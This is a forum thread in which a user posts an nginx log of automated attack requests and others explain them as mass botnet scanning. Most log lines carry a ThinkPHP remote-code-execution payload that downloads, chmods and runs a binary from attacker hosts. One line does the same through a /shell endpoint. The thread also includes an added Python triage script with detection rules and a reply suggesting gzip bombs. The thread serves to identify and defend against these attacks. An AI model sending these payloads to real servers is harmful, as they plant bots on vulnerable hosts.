As in the title. Below is the nginx log:
42.116.132.217 - - [03/Feb/2020:04:46:21 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
95.56.46.16 - - [03/Feb/2020:04:51:17 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.115.154.162 - - [03/Feb/2020:04:56:31 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.113.229.201 - - [03/Feb/2020:04:56:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.117.213.8 - - [03/Feb/2020:05:12:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
183.80.226.167 - - [03/Feb/2020:05:43:14 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.54.51.37 - - [03/Feb/2020:06:43:59 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
183.81.106.253 - - [03/Feb/2020:06:46:19 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
176.163.32.15 - - [03/Feb/2020:07:16:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
189.154.64.227 - - [03/Feb/2020:08:27:51 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
41.248.244.123 - - [03/Feb/2020:09:46:58 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
95.58.245.64 - - [03/Feb/2020:10:01:27 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.54.146.50 - - [03/Feb/2020:11:44:40 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.113.211.238 - - [03/Feb/2020:12:02:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.118.70.112 - - [03/Feb/2020:12:41:39 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
118.68.197.228 - - [03/Feb/2020:12:56:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.117.137.217 - - [03/Feb/2020:13:08:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
60.24.45.148 - - [03/Feb/2020:13:39:36 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
58.186.78.50 - - [03/Feb/2020:13:46:47 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
118.71.4.28 - - [03/Feb/2020:15:07:50 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.53.177.26 - - [03/Feb/2020:15:08:30 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
61.220.75.34 - - [03/Feb/2020:15:40:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
207.216.89.109 - - [03/Feb/2020:16:19:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.114.189.116 - - [03/Feb/2020:17:52:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
61.80.151.145 - - [03/Feb/2020:18:04:37 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
74.80.28.217 - - [03/Feb/2020:18:25:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 575 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
190.122.112.58 - - [03/Feb/2020:18:40:04 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Karu/2.0"
1
bosskwei 2020-02-03 19:16:38 +08:00 1
It's mass scanning for hosts to turn into bots, and planting a shell on them.
2
opengps 2020-02-03 19:19:18 +08:00 via Android
Looking for a vulnerability in your site so they can inject their code.
3
virusdefender 2020-02-03 19:45:28 +08:00
A thinkphp vulnerability scanner.
4
OllyDebug 2020-02-03 19:48:40 +08:00 via iPhone
Vulnerability scanning.
5
xiri 2020-02-03 20:10:06 +08:00
It's Internet-wide mass scanning, not necessarily aimed at you. If the scan hits, a shell gets planted and the host becomes a bot.
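A triage pass over log lines like the ones in this thread, as an added example that is not part of any post: it undoes nginx's `\xHH` log escaping, flags the two request shapes seen in the log above, and separates probes answered with 4xx from ones that need a closer look. The rule names, the sample lines, the documentation IPs and the `example.invalid` host are constructed for this example.

```python
import re

# nginx "combined" access-log layout; nginx writes control bytes, '"' and '\' as \xHH.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')

# Rule names and patterns are this example's own, derived from the requests in the thread.
RULES = [
    ("thinkphp-invokefunction",
     re.compile(r"invokefunction&function=call_user_func_array", re.I)),
    ("shell-endpoint-cmd", re.compile(r"^\S+ /shell\?", re.I)),
    ("fetch-chmod-run", re.compile(r"\b(?:wget|curl)\b.+\bchmod\b", re.I)),
]

def unescape(field):
    """Undo nginx's \\xHH log escaping so rules see the bytes the client sent."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), field)

def triage(lines):
    """Return one record per log line that matches at least one rule."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        request = unescape(m["request"]).replace("+", " ")
        rules = [name for name, rx in RULES if rx.search(request)]
        if rules:
            # 4xx: the server refused this request. Anything else needs a closer look.
            verdict = "rejected" if m["status"].startswith("4") else "investigate"
            hits.append({"ip": m["ip"], "status": m["status"], "agent": m["agent"],
                         "rules": rules, "verdict": verdict})
    return hits

# Constructed sample lines (documentation IPs, placeholder host), shaped like the thread's log.
SAMPLE_LOG = r'''
192.0.2.10 - - [03/Feb/2020:04:46:21 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://example.invalid/x -O /tmp/x; chmod 777 /tmp/x; /tmp/x' HTTP/1.1" 400 173 "-" "Unstable/2.0"
198.51.100.7 - - [03/Feb/2020:18:25:37 +0800] "GET /shell?cd+/tmp;wget+http:/\x5C/example.invalid/.j;chmod+777+.j;sh+.j HTTP/1.1" 400 575 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Feb/2020:18:30:00 +0800] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Feb/2020:18:40:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id HTTP/1.1" 200 41 "-" "Karu/2.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Every request in the thread's log was answered with status 400, so this pass would mark all of them `rejected`; a matching line with any other status is the one to follow up on.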
6
ysc3839 2020-02-04 06:17:28 +08:00 via Android 3
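If your website doesn't use PHP, you could consider returning a gzip bomb whenever a .php file is requested.
A gzip bomb means compressing a very large amount of blank data with gzip. It becomes very small after compression, and if the client decompresses gzip automatically it will consume a large amount of memory and will quite likely crash.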
9
ysc3839 2020-02-04 18:35:32 +08:00 via Android